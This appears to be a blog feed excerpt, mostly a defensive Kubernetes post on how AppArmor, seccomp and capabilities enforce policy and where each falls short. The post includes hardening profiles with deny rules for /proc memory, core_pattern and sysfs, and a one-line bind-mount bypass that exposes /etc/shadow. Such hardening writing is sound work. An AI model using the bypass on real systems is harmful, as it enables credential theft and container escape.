&lt;strong&gt;Operationally Non-Trivial&lt;/strong&gt;: HA deployment, CA rotation planning, RBAC governance, and debugging skills are requirements for production, not afterthoughts.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For teams that outgrow VPN + bastion + manual key rotation, Teleport is one of the most complete infrastructure access platforms available. The architecture is sound, the developer experience is strong, and the compliance story is well-developed. Adopt it with eyes open to the operational investment it requires, and it will pay dividends in security posture and audit readiness.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Official Documentation&lt;/strong&gt;: &lt;a href="https://goteleport.com/docs/" rel="noopener noreferrer"&gt;https://goteleport.com/docs/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Repository&lt;/strong&gt;: &lt;a href="https://github.com/gravitational/teleport" rel="noopener noreferrer"&gt;https://github.com/gravitational/teleport&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Community Forum&lt;/strong&gt;: &lt;a href="https://github.com/gravitational/teleport/discussions" rel="noopener noreferrer"&gt;https://github.com/gravitational/teleport/discussions&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Architecture Reference&lt;/strong&gt;: &lt;a href="https://goteleport.com/docs/reference/architecture/" rel="noopener noreferrer"&gt;https://goteleport.com/docs/reference/architecture/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security Whitepaper&lt;/strong&gt;: Available on Teleport website&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance Documentation&lt;/strong&gt;: SOC 2, FedRAMP, and other certifications&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cloud</category>
      <category>infrastructure</category>
      <category>identity</category>
    </item>
    <item>
      <title>AppArmor and Seccomp in Kubernetes: What the Docs Don't Tell You</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 22 Mar 2026 19:05:33 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/apparmor-and-seccomp-in-kubernetes-what-the-docs-dont-tell-you-4856</link>
      <guid>https://dev.to/piyushjajoo/apparmor-and-seccomp-in-kubernetes-what-the-docs-dont-tell-you-4856</guid>
      <description>&lt;p&gt;You've read the Kubernetes security docs. You know to set &lt;code&gt;appArmorProfile: RuntimeDefault&lt;/code&gt; and &lt;code&gt;seccompProfile: RuntimeDefault&lt;/code&gt;. You've ticked the CIS Benchmark boxes. And yet, if a container in your cluster were compromised right now, you might be surprised by what these controls would — and wouldn't — stop.&lt;/p&gt;

&lt;p&gt;This post is for engineers who've moved past configuration and want to reason about AppArmor and seccomp under pressure: their real enforcement models, where each fails, how they interact, how to manage them at scale, and what breaks first in production.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;If you haven't read the companion post on syscalls&lt;/strong&gt; — &lt;a href="https://platformwale.blog/2026/03/18/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything/" rel="noopener noreferrer"&gt;Syscalls in Kubernetes: The Invisible Layer That Runs Everything&lt;/a&gt; — the enforcement mechanics below will make more sense with that foundation. Both controls operate on the syscall path; understanding &lt;em&gt;what a syscall is and how it traverses the kernel&lt;/em&gt; is prerequisite context.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Why Platform Teams Should Care&lt;/li&gt;
&lt;li&gt;How the Kernel Enforces Security: Not a Pipeline&lt;/li&gt;
&lt;li&gt;From Syscall to Enforcement: The Full Execution Path&lt;/li&gt;
&lt;li&gt;The Runtime Default Trap&lt;/li&gt;
&lt;li&gt;Managing Profiles at Scale: Declarative or Nothing&lt;/li&gt;
&lt;li&gt;
Writing a Real Profile: The Rule Model

&lt;ul&gt;
&lt;li&gt;The Path-Based Trap&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;What AppArmor Won't Stop&lt;/li&gt;
&lt;li&gt;
AppArmor vs. Seccomp vs. SELinux: An Opinionated Take

&lt;ul&gt;
&lt;li&gt;Choosing AppArmor vs. SELinux at Platform Level&lt;/li&gt;
&lt;li&gt;Control Failure Mode Comparison&lt;/li&gt;
&lt;li&gt;When Is seccomp Alone Enough?&lt;/li&gt;
&lt;li&gt;LSM Stacking: The Frontier&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
Seccomp: Deeper Than You Think

&lt;ul&gt;
&lt;li&gt;The cBPF Filter Model&lt;/li&gt;
&lt;li&gt;Return Actions (More Than Allow/Deny)&lt;/li&gt;
&lt;li&gt;Argument Filtering: The Underused Power Feature&lt;/li&gt;
&lt;li&gt;Two Non-Obvious Properties&lt;/li&gt;
&lt;li&gt;What Seccomp Won't Stop&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A Threat Scenario: Container Escape Attempt&lt;/li&gt;
&lt;li&gt;What Breaks First in Production&lt;/li&gt;
&lt;li&gt;Performance Considerations&lt;/li&gt;
&lt;li&gt;A Production-Grade Pod Spec&lt;/li&gt;
&lt;li&gt;Observability: Catching Denials Before They Become Incidents&lt;/li&gt;
&lt;li&gt;Compliance Mapping&lt;/li&gt;
&lt;li&gt;A Realistic Failure Postmortem&lt;/li&gt;
&lt;li&gt;AppArmor's Threat Model Boundary&lt;/li&gt;
&lt;li&gt;The Operational Cost of AppArmor&lt;/li&gt;
&lt;li&gt;Common Anti-Patterns&lt;/li&gt;
&lt;li&gt;Platform Team Playbook&lt;/li&gt;
&lt;li&gt;Designing for Control Failure&lt;/li&gt;
&lt;li&gt;Key Takeaways&lt;/li&gt;
&lt;li&gt;The Real Purpose of AppArmor&lt;/li&gt;
&lt;li&gt;If You Remember Only One Thing Per Control&lt;/li&gt;
&lt;li&gt;Closing Thoughts&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Platform Teams Should Care
&lt;/h2&gt;

&lt;p&gt;Most Kubernetes clusters already run with several security controls in place:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pod Security Standards at admission&lt;/li&gt;
&lt;li&gt;seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; filtering syscalls&lt;/li&gt;
&lt;li&gt;NetworkPolicies governing traffic paths&lt;/li&gt;
&lt;li&gt;RBAC limiting API surface&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So why add AppArmor to that stack?&lt;/p&gt;

&lt;p&gt;Because those controls primarily restrict &lt;em&gt;what a container can ask the kernel to do&lt;/em&gt; — not &lt;em&gt;what resources it can access once it's running&lt;/em&gt;. AppArmor fills a specific gap in that model:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;What it restricts&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Capabilities&lt;/td&gt;
&lt;td&gt;Privileged kernel operations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp&lt;/td&gt;
&lt;td&gt;Syscall invocation surface&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetworkPolicy&lt;/td&gt;
&lt;td&gt;Network ingress/egress paths&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AppArmor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Filesystem + kernel object access&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For platform teams operating multi-tenant clusters, this gap matters for two distinct reasons:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Containment.&lt;/strong&gt; A compromised container running under a tight AppArmor profile cannot read &lt;code&gt;/etc/shadow&lt;/code&gt;, traverse &lt;code&gt;/proc/*/maps&lt;/code&gt;, write to &lt;code&gt;/sys/kernel/**&lt;/code&gt;, or access service account tokens it wasn't explicitly granted. The blast radius of a post-exploitation scenario is substantially smaller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Detection signal.&lt;/strong&gt; AppArmor denials fire early. When an attacker inside a container attempts reconnaissance — reading process maps, accessing credential paths, probing kernel interfaces — they hit AppArmor rules before they hit application-level controls. In many real incidents, AppArmor denial logs are the first signal that something is wrong, appearing minutes before behavioral anomalies surface in application logs.&lt;/p&gt;

&lt;p&gt;Without mandatory access controls like AppArmor or SELinux, a compromised container often has far broader read access to the host filesystem and &lt;code&gt;/proc&lt;/code&gt; namespace than platform teams realize — even under PSS &lt;code&gt;Restricted&lt;/code&gt;. AppArmor is the layer that makes that access explicit and auditable.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Kernel Enforces Security: Not a Pipeline
&lt;/h2&gt;

&lt;p&gt;A common mental model is that capabilities, AppArmor, and seccomp form an ordered enforcement stack. That's a useful simplification, but it's not how the kernel works — and the difference matters when you're reasoning about bypasses.&lt;/p&gt;

&lt;p&gt;All three are enforced inside the Linux kernel, but at different enforcement points with different objects:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; gate privileged operations at the point they're requested (e.g., &lt;code&gt;CAP_NET_BIND_SERVICE&lt;/code&gt; before binding to a port below 1024).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; intercepts syscalls before they execute, using a BPF filter to allow, deny, or trap them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; is a Linux Security Module (LSM) that hooks into kernel object access — mediating access to files, sockets, capabilities, and IPC based on a per-process policy.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There is no strict serial pipeline. A process action may be evaluated against all three simultaneously, each at their respective hook point.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1peeu6gyx3s5ftp68rxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1peeu6gyx3s5ftp68rxi.png" alt="image" width="800" height="734"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AppArmor is uniquely path-aware in a way that neither capabilities nor seccomp are — it can express "this process may read &lt;code&gt;/etc/nginx/**&lt;/code&gt; but not &lt;code&gt;/etc/passwd&lt;/code&gt;" — which is why it complements rather than duplicates the others.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  From Syscall to Enforcement: The Full Execution Path
&lt;/h2&gt;

&lt;p&gt;Before diving into each control individually, it's worth being precise about &lt;em&gt;when&lt;/em&gt; each fires. The ordering matters when you're reasoning about bypasses — and it's commonly misunderstood.&lt;/p&gt;

&lt;p&gt;When a container process makes a syscall, here's the actual sequence inside the kernel:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Process
   │
   └── syscall()            ← ring 3 → ring 0 transition
         │
         ├── seccomp filter (classic BPF)
         │        │
         │        ├── KILL / ERRNO / TRAP / NOTIFY → exit here, never reaches kernel
         │        └── ALLOW → continue
         │
         ├── kernel executes syscall logic
         │        │
         │        └── LSM hooks fire (AppArmor / SELinux)
         │                 │
         │                 ├── path / capability / network label check
         │                 └── DENY → EACCES, operation aborted
         │
         ├── capability checks (if privileged op requested)
         │        │
         │        └── e.g. CAP_SYS_ADMIN for mount(), CAP_NET_RAW for raw sockets
         │
         └── actual resource access (filesystem, network, IPC)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The critical implication: &lt;strong&gt;seccomp executes before LSM hooks&lt;/strong&gt;. In most common syscall paths, seccomp is evaluated at syscall entry, followed by LSM hooks (AppArmor/SELinux) and capability checks during operation-specific validation — the exact interleaving varies by syscall and operation type, but the invariant that matters is: a syscall denied by seccomp never reaches the AppArmor evaluation point. Conversely, a syscall allowed by seccomp is still subject to AppArmor's access controls on what that syscall can touch.&lt;/p&gt;

&lt;p&gt;Capabilities complete the triad. They're evaluated alongside LSM hooks for many operations and gate the &lt;em&gt;privilege level&lt;/em&gt; of what a process can do — independent of both which syscalls it can invoke (seccomp) and which objects it can access (AppArmor). In practice, dropping capabilities is often the simplest way to eliminate entire exploit paths before seccomp or AppArmor need to engage. Dropping &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; removes more attack surface with one line than most seccomp tuning achieves:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; → reduce what the kernel will execute&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; → reduce what processes can access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; → reduce what processes are privileged to do&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why the three controls are complementary by design, not redundant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; answers: &lt;em&gt;can this syscall be invoked at all?&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; answers: &lt;em&gt;given this syscall is allowed, what can it operate on?&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; answers: &lt;em&gt;does this process hold the privilege required for this operation?&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A workload with all three configured correctly gets seccomp narrowing the callable surface, capabilities bounding privilege, then AppArmor restricting what permitted syscalls can reach. Remove any layer and the others become your only backstop.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AppArmor reduces blast radius. Seccomp reduces reachable attack surface.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;These are different threat properties. Seccomp blocking &lt;code&gt;mount()&lt;/code&gt; means the exploit path requiring &lt;code&gt;mount()&lt;/code&gt; simply cannot execute — the kernel never sees it. AppArmor can't block a syscall entirely (it operates after kernel entry), but it can block every &lt;em&gt;object&lt;/em&gt; that syscall would have reached. They defend different dimensions.&lt;/p&gt;

&lt;p&gt;One insight that gets lost in feature comparisons: most container escapes don't bypass all controls — they exploit the &lt;strong&gt;gaps between them&lt;/strong&gt;. CVE-2022-0492 required &lt;code&gt;unshare()&lt;/code&gt; and &lt;code&gt;mount()&lt;/code&gt; in sequence; seccomp's RuntimeDefault blocked &lt;code&gt;mount()&lt;/code&gt;, AppArmor's default profile independently denied it too. Either layer alone would have stopped the exploit. Security failures are rarely about a single mechanism failing — they're about assumptions breaking at the boundaries between seccomp, LSMs, and capabilities. Understanding those boundaries is what this article is actually about.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Runtime Default Trap
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;RuntimeDefault&lt;/code&gt; is not a single profile. It's an instruction to the container runtime to apply &lt;em&gt;its own&lt;/em&gt; default profile — and that profile differs across runtimes.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;containerd&lt;/strong&gt; delegates to the &lt;code&gt;default.profile&lt;/code&gt; shipped by the runtime shim.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CRI-O&lt;/strong&gt; uses a profile derived from the OCI runtime spec with its own modifications.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker&lt;/strong&gt; uses its own &lt;code&gt;docker-default&lt;/code&gt; profile (relevant in non-Kubernetes contexts).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Modern runtimes have largely converged on a similar baseline, but differences still exist in rule ordering, abstraction includes, and which operations are allowed. In hardened environments, those deltas matter — you're reasoning about a security envelope you don't fully control.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi6mksarg3ut2mkp16hyk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi6mksarg3ut2mkp16hyk.png" alt="image" width="800" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The only way to get a consistent, auditable security envelope is to manage your own &lt;code&gt;Localhost&lt;/code&gt; profiles:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;appArmorProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Localhost&lt;/span&gt;
    &lt;span class="na"&gt;localhostProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/nginx-v2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That &lt;code&gt;localhostProfile&lt;/code&gt; value is a path relative to &lt;code&gt;/etc/apparmor.d/&lt;/code&gt; on the node. Which brings us to the hard problem: getting profiles onto nodes reliably.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The platform implication for multi-cluster environments:&lt;/strong&gt; two clusters running identical pod manifests can have subtly different effective security envelopes depending on their runtime. This creates configuration drift that is largely invisible in CI pipelines — a security review comparing manifests will see the same &lt;code&gt;RuntimeDefault&lt;/code&gt; annotation, but the actual enforcement may differ. The only reliable mitigation is to treat profiles as versioned infrastructure and manage them declaratively, as covered in the next section.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Managing Profiles at Scale: Declarative or Nothing
&lt;/h2&gt;

&lt;p&gt;The naive approach is a DaemonSet that writes profile files and runs &lt;code&gt;apparmor_parser -r&lt;/code&gt;. This works until it doesn't — profile updates require careful ordering, new nodes joining the cluster won't have profiles until the DaemonSet pod schedules there, and you have no audit trail.&lt;/p&gt;

&lt;p&gt;At cluster scale, profile lifecycle must be reconciled declaratively. The &lt;strong&gt;&lt;a href="https://github.com/kubernetes-sigs/security-profiles-operator" rel="noopener noreferrer"&gt;Security Profiles Operator (SPO)&lt;/a&gt;&lt;/strong&gt; is currently the most production-ready implementation of that model — a Kubernetes-native controller that manages AppArmor (and seccomp) profiles as first-class CRDs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frfcgfmbi5hd27xhghpcm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frfcgfmbi5hd27xhghpcm.png" alt="image" width="800" height="317"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SPO reconciles profiles onto nodes, surfaces violations as Kubernetes events, and integrates with OPA/Gatekeeper to enforce that pods only reference profiles that are actually loaded. It also has a &lt;code&gt;--record&lt;/code&gt; mode that observes a running workload and generates a profile from its real behavior — invaluable for brownfield workloads.&lt;/p&gt;

&lt;p&gt;Here's what a real SPO-managed &lt;code&gt;AppArmorProfile&lt;/code&gt; CRD looks like for an nginx container. The Kubernetes metadata section is standard — &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;namespace&lt;/code&gt; are how pods reference the profile. The &lt;code&gt;spec.policy&lt;/code&gt; field is a raw AppArmor policy written in AppArmor's own language, which SPO writes directly to &lt;code&gt;/etc/apparmor.d/&lt;/code&gt; on each node:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;security-profiles-operator.x-k8s.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AppArmorProfile&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx-restricted&lt;/span&gt;       &lt;span class="c1"&gt;# pods reference this name in appArmorProfile.localhostProfile&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;        &lt;span class="c1"&gt;# profile is scoped to this namespace&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;#include &amp;lt;tunables/global&amp;gt;  # defines @{PROC}, @{HOME} and other path variables&lt;/span&gt;
    &lt;span class="s"&gt;profile nginx-restricted flags=(attach_disconnected) {&lt;/span&gt;
      &lt;span class="s"&gt;# attach_disconnected: allow profile to apply even if the binary path&lt;/span&gt;
      &lt;span class="s"&gt;# isn't reachable at load time (common in containers with overlayfs)&lt;/span&gt;

      &lt;span class="s"&gt;#include &amp;lt;abstractions/base&amp;gt;        # allows libc, locale files, /dev/null etc.&lt;/span&gt;
      &lt;span class="s"&gt;#include &amp;lt;abstractions/nameservice&amp;gt; # allows DNS resolution (/etc/resolv.conf, nsswitch)&lt;/span&gt;

      &lt;span class="s"&gt;# Allow outbound TCP only — no UDP, no raw sockets&lt;/span&gt;
      &lt;span class="s"&gt;network inet tcp,&lt;/span&gt;
      &lt;span class="s"&gt;network inet6 tcp,&lt;/span&gt;

      &lt;span class="s"&gt;# Binary: map+read+execute (mr). Denies writes to the nginx binary itself.&lt;/span&gt;
      &lt;span class="s"&gt;/usr/sbin/nginx mr,&lt;/span&gt;

      &lt;span class="s"&gt;/etc/nginx/** r,          # read-only access to all nginx config files&lt;/span&gt;
      &lt;span class="s"&gt;/var/log/nginx/** w,      # write access for access/error logs&lt;/span&gt;
      &lt;span class="s"&gt;/var/cache/nginx/** rw,   # read+write for proxy cache and temp files&lt;/span&gt;
      &lt;span class="s"&gt;/tmp/** rw,               # read+write for nginx temp upload/body buffers&lt;/span&gt;

      &lt;span class="s"&gt;# Explicit denials — these take precedence over any allow rules above&lt;/span&gt;
      &lt;span class="s"&gt;deny /proc/sys/kernel/core_pattern w,  # prevent overwriting core dump handler (container escape vector)&lt;/span&gt;
      &lt;span class="s"&gt;deny @{PROC}/*/mem rw,                 # prevent reading/writing any process's memory&lt;/span&gt;
      &lt;span class="s"&gt;deny /sys/** w,                        # prevent writing to sysfs (kernel tunable manipulation)&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Writing a Real Profile: The Rule Model
&lt;/h2&gt;

&lt;p&gt;AppArmor rules follow a simple pattern: &lt;code&gt;[qualifier] [resource] [permissions]&lt;/code&gt;. But the devil is in the details — particularly the path model.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# File rules
/etc/nginx/** r          # read all files under /etc/nginx
/var/log/nginx/*.log w   # write to log files
/tmp/nginx-*/ rw         # read/write temp directories
/run/nginx.pid rw        # read/write PID file

# Capability rules
capability net_bind_service,   # allow binding to ports &amp;lt; 1024
capability dac_override,       # override file permission checks (avoid if possible)

# Network rules
network inet tcp,
network inet6 tcp,
deny network raw,              # deny raw sockets explicitly

# Deny dangerous kernel paths explicitly
deny /proc/sys/kernel/** w,
deny @{PROC}/*/maps r,         # prevent reading process memory maps (explicit deny required)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A profile worth deploying has explicit &lt;code&gt;deny&lt;/code&gt; rules, not just allowances. The &lt;code&gt;deny&lt;/code&gt; keyword takes precedence over allow rules and is your backstop against profile inheritance tricks. Default-deny with explicit allows is the correct mental model.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Path-Based Trap
&lt;/h3&gt;

&lt;p&gt;AppArmor evaluates rules against &lt;strong&gt;resolved path strings&lt;/strong&gt;, not inodes. This is a non-obvious but important limitation.&lt;/p&gt;

&lt;p&gt;If an attacker inside a container can manipulate how paths resolve — through bind mounts, symlinks, or mount namespace tricks — they may be able to access a file via an allowed path that reaches an inode your policy intended to restrict. For example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# If /allowed-dir is permitted and an attacker can bind-mount /etc/shadow there:&lt;/span&gt;
mount &lt;span class="nt"&gt;--bind&lt;/span&gt; /etc/shadow /allowed-dir/shadow   &lt;span class="c"&gt;# now readable via allowed path&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Well-written profiles must pair with &lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; and careful namespace configuration to close this class of bypass. It's not a reason to avoid AppArmor, but it's a reason to understand what you're actually enforcing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Generating a starting profile&lt;/strong&gt;: Use &lt;code&gt;aa-genprof&lt;/code&gt; to record behavior in complain mode, then tighten from there. For containers, SPO's &lt;code&gt;--record&lt;/code&gt; mode is cleaner.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Load a profile in complain mode (logs denials, doesn't enforce)&lt;/span&gt;
apparmor_parser &lt;span class="nt"&gt;-C&lt;/span&gt; /etc/apparmor.d/my-profile

&lt;span class="c"&gt;# Watch would-be denials in real time&lt;/span&gt;
journalctl &lt;span class="nt"&gt;-k&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; | &lt;span class="nb"&gt;grep &lt;/span&gt;apparmor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What AppArmor Won't Stop
&lt;/h2&gt;

&lt;p&gt;This is the section most blog posts skip.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AppArmor Coverage vs. Threat Severity

  HIGH  │ ✗ Kernel CVE bypass          ║ ✓ Cgroup release_agent escape  
        │ ✗ In-memory / ROP chain      ║ ✓ Write to /sys or /proc/kernel 
S       │ ✗ Network exfiltration       ║ ✓ Service account token read    
E       │ ✗ Misloaded profile (silent) ║ ✓ Read /proc/*/maps (recon)     
V       │ ✗ Path traversal/bind mount  ║                                  
E  ─────┼──────────────────────────────╫────────────────────────────────
R       │                              ║                                  
I       │      (no threats here —      ║ ✓ Raw socket creation            
T       │       low severity threats   ║                                  
Y       │       not covered by AA      ║                                  
        │       are acceptable risk)   ║                                  
  LOW   │                              ║                                  
        └──────────────────────────────╨────────────────────────────────
                LOW COVERAGE                   HIGH COVERAGE
                              ◄── AppArmor Coverage ──►

  ✗ = AppArmor does NOT cover this threat (needs other controls)
  ✓ = AppArmor blocks this (if profile is correctly written)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Network exfiltration&lt;/strong&gt;: AppArmor can allow or deny protocol families (TCP, UDP, raw) but has no concept of destination IPs or domains. A process with &lt;code&gt;network inet tcp&lt;/code&gt; allowed can exfiltrate data to any external endpoint. That's NetworkPolicy's domain — and the two must work together.&lt;/p&gt;

